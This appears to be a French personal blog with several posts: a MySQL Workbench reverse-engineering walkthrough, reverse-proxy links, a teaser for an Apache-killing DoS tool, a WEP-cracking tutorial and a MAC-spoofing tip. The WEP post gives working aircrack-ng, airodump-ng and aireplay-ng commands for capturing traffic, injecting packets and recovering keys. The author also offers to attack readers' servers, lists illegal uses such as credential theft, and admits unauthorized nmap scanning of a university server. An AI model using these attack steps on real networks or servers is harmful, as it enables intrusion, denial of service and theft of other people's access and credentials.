Dans le cadre de mon stage on m’a montré un beau schéma de la base de donnée de l’un des sites internet de l’entreprise et ma première pensée, un tantinet primitive, fût: « Quoi??!! C’est possible de faire ça??!! Trop coooool!!!!  »

Ni une, ni deux, a peine rentré chez moi que je me mets à faire quelques recherche sur Google pour tomber sur MySQL Workbench. Aïe ça marche sous Linux ça?? Ben oui!!!

Après avoir installé le .deb MySQL Workbench 5.1.16 (i386) je me suis mis à faire un petit schéma d’une base sous Magento pour voir ce que ça donne (et c’est un joyeux bordel! :s).

Donc voici les explications en images une fois le paquet installé.

Tout d’abord se rendre dans: Applications => Programmation => MySQL Workbench

Il vous faut ensuite cliquer sur: Database => Manage Connection

Ensuite cliquez sur « New » pour rentrer une nouvelle connexion à un serveur MySQL. Dans mon exemple je suis en local, donc je rentre localhost (127.0.0.1), root en user et le mot de passe root.

Cliquez ensuite sur: Database => Reverse Engineer

Ensuite selection la connextion crée précédement et cliquez sur Next

Choisissez ensuite la base pour laquelle vous voulez faire un schéma, puis Next (ici j’ai selectionné Joomla, mais en fait c’est Magento)

Et voila! Ici un petit zoom sur quelques tables

Et ici un dezoom sur l’ensemble des tables de Magento… bon courage pour s’y retrouver….

Fonctionnement d’un Reverse Cache Proxy:

Les Solutions de Reverse Cache Proxy

• Apache (mod_proxy) ♥♥

  • Apache comme Proxy
    

  • HowTo : installer Apache en reverse proxy (Ubuntu server)

  • Manager Drupal derière un reverse proxy
    

• Squid ♥♥♥ (longue expérience dans le caching)

  • Squid Reverse Proxy

  • Drupal & Squid proxy cache ♥♥♥♥

  • Infra sous Magento (Squid+Memcached) ♥♥♥

• NGINX ♥♥♥ : utilisé par de très gros sites (ex : WordPress.com, Hulu, Gravatar, Youporn… désolé pour la référence mais quand même 57e mondial selon Alexa…)

  • Intro et configuration (Papy Geek)

  • Intro et configuration (Korben)

• Varnish (jamais entendu parler mais revient très souvent comme solution Pro pour grosses infrastructures)

  • Drupal & Varnish

  • Pressflow for Drupal (support for squid caching)

• Haproxy (load balancer, pour le cache je ne sais pas) (anti-slowloris par excellence)

• Pound (reverse-proxy load balancing server) (installation)

Comparatifs :

• Benchmark (Apache, Vulture, ISA Serveur) ♥♥♥

• Drupal webserver configuration compared ♥♥

• Comparaisons qui datent sur des solutions obscures…

Cas Pratiques :

• Virtua Network (NGINX + Varnish)

• Voici.fr avec un proxy Squid (Karlesnine.com un très bon blog d’un admin système. A must follow!)

• Voici.fr optimisation cache (Karlesnine.com)

Voili voilou, j’espère que vous trouverez votre bonheur là dedans. En ce qui me concerne je pencherai soit pour Squid, soit pour NGINX.

Hier j’ai découvert un programme sous perl des plus effrayant qui soit: il permet de mettre à genoux n’importe quel serveur web utilisant Apache en quelques secondes. Le programme est d’une simplicité enfantine et ne nécessite aucune puissance de calcul (donc pas besoin de botnet). Il se base sur une attaque de type SYN mais au lieu de flooder en TCP il flood en HTTP (il fallait y penser!!!).

Je l’ai personnellement essayé: redoutable! Aucun serveur n’est à l’abri quelque soit son load balancing! Le problème pour les admins c’est qu’il n’existe aucun moyen de s’en protéger à part avec un reverse proxy et encore!!!

Là vous allez me dire: « Bon d’accord c’est quoi le nom de ton programme? ». MAIS VOUS RÊVEZ!! Si je vous le donnais, la première chose que vous feriez c’est mettre down mon serveur! Or je ne peux pas m’en protéger… Je signerai mon propre arrêt de mort et celui de tous les serveurs web qui vous passerai par la tête! D’ailleurs personne n’a d’intérêt à ce qu’il devienne populaire! Je vous rappelle qu’Apache c’est 67% du marché selon Netcraft!

Mais je comprend votre curiosité alors je vous donne un indice:

Si vous trouvez le nom de l’animal en anglais, vous n’aurez pas de mal à trouver le programme en question (non ce n’est pas un Panda…. )

PS: si vous ne croyez pas, donnez moi l’adresse de votre serveur web et une heure donnée pour une attaque (hors pointe de trafic de préférence) et vous verrez l’ampleur de la chose….

En ce moment en cours on parle de temps à autre de sécurité sur les réseaux wifi et autre. Or parfois je fais le mec chiant en disant « Oui, mais c’est pas sécurisé » etc. On me regarde avec des yeux ronds et certains doivent penser « Oui bon, la sécurité, à moins de tomber sur un super hacker, pas trop de risques… arrête de nous faire chier! ». Hé bien non justement… Je vais vous montrer à quel point il est simple de craker une clé WEP sur un réseau sans fils et qu’il est nul besoin d’être un génie en informatique… la preuve, même moi j’y arrive et je suis tout sauf un génie…

Passons à la pratique: que faut-il pour cracker une clé WEP? Il faut:

- Un PC: un laptop de préférence

- Un bon OS: j’utiliserai Backtrack 3, une distribution Linux dédiée à la sécurité

- Une bonne carte wifi: une Alfa AWUS036H

La première étape est d’installer Backtrack sur une clé USB et de la rendre bootable, rien de plus simple: télécharger Backtrack USB et exécuter bootinst.sh (dans BOOT). Ensuite on la colle dans les fesses du laptop, on branche sa carte wifi, on démarre le portable et on boot sur la clé dans le BIOS.

Une fois sous Backtrack on ouvre un terminal et on tape:

iwconfig

ce qui doit donner un truc ressemblant à ça:

wlan2     IEEE 802.11bg  ESSID: »FreeWifi »
Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated
Tx-Power=20 dBm
Retry min limit:7   RTS thr:off   Fragment thr=2352 B
Power Management:off
Link Quality:0  Signal level:0  Noise level:0
Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Ce qui nous intéresse c’est wlan2 qui est notre carte wifi.

Maintenant pour écouter le trafic il faut passer la carte en mode monitor. Backtrack fourni la suite logicielle aircrack-ng qui le permet (note: sous ubuntu, installer en tapant sudo apt-get install aircrack-ng). Pour passer la carte en mode monitor il suffit d’utiliser airmon-ng, pour cela:

airmon-ng start wlan2

Ce qui donne un truc du style:

Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID    Name
3597    NetworkManager
3616    wpa_supplicant
3621    avahi-daemon
3622    avahi-daemon
4643    dhclient

Interface    Chipset        Driver

wlan2        RTL8187     rtl8187 – [phy2]

Bref, maintenant que tout est opérationnel on va rentrer dans le vif du sujet!

Ensuite nous allons chercher des réseaux wifi utilisant le cryptage WEP, pour cela:

airodump-ng –encrypt wep wlan2

Cela nous donne:

BSSID: correspond à l’adresse MAC du routeur (ex: Livebox, Neufbox, etc.)

ESSID: c’est le nom du réseau (ex: neuf wifi)

CH: pour channel, c’est le canal.

En dessous: STATION, c’est l’adresse MAC des PC clients connecté à la box (BSSID). Ici on voit qu’il identifie bien des clients mais qu’il n’arrive par à trouver à quelle box (BSSID) ils sont associés.

NOTE: les screens du dessus sont sous Ubuntu, alors que les screens qui vont venir sont sous Backtrack. Sous Ubuntu, je n’avais pas de box associée, mais peu importe.

Imaginons donc que vous avez votre BSSID et une STATION connecté, vous lancez:

airodump-ng -w DATA-NUMERICABLE -c 6 –bssid XX:XX:XX:XX:XX:XX wlan2

Explications:

-w = écrire dans un fichier suivit du nom de fichier (ici DATA-NUMERICABLE)

-c = le channel (ici le channel 6)

– bssid = l’adresse mac de la box (BSSID)

Cette commande permet de cibler uniquement la connexion wifi voulue et à capturer les DATA dans un .cap

Maintenant que la capture est lancée, nous allons injecter des paquets pour faire grimper les DATA.Pour ce faire nous allons utiliser aireplay-ng en tapant:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b XX:XX:XX:XX:XX:XX -h CC:CC:CC:CC:CC:CC wlan2

-c = n’importe quoi, une adresse MAC aléatoire

-b = le BSSID de la box

- h = l’adresse MAC de la station client connecté à la box

Une fois la commande lancée, il va se mettre à lire des paquets, puis vous proposer d’en injecter (voir screen). Un bon paquet commence par 0842 !!

Voila une fois que vous approuvez le paquet, l’injection commence et les DATA devraient grimper à mort! Si vous regardez mon screen précédent vous remarquerez  dans la colonne DATA que je suis déjà à 87897 ! En fait, j’ai fait le screen après avoir lancé le craquage du .cap (ce que je vais expliquer). Normalement à partir de 50000 vous pouvez commencer à craquer.

Dernière étape: le décryptage

On a donc fait nos capture dans le fichier DATA-NUMERICABLE, nous avons plus qu’à utiliser aircrack-ng, pour cela ouvrir dans un troisième terminal:

aircrack-ng -P2 DATA-NUMERICABLE.cap

Ayé c’est parti et normalement au bout de quelques minutes:

Voila c’est fini vous avez votre clé WEP!

NOTE:

Bien sûr vous n’avez le droit de faire ça que sur votre connexion pas sur celle du voisin. Vous me direz, « Quel serait l’intérêt de le faire chez le voisin si ce n’est pour lui piquer sa connexion internet? » Mais ça sert à plein de choses!!! Faire des MITM et de l’Arp Poisonning et piquer ses identifiants Gmail, Spoofer ses DNS, mener des attaques sur le web, etc… les utilisations illégales sont multiples, mais c’est INTERDIT! (et je suis un brave étudiant en Droit!! )

Voili, voilou et bon week-end

Donc petite astuce simplisime au possible:

sudo macchanger -A wlan0

Ayé, votre adresse MAC n’est plus la même sur votre carte wifi (à adapter selon votre carte: eth0, etc..).

Apparemment à Dauphine ils doivent associer login et adresse MAC, car sitôt fait je me suis fait bannir du serveur… (ou alors serait-ce à cause des grand coups de nmap -sS que j’envoie sur le serveur??). Bref, plus de connexion à la fac pour dieu sait combien de temps.

A+ les Tux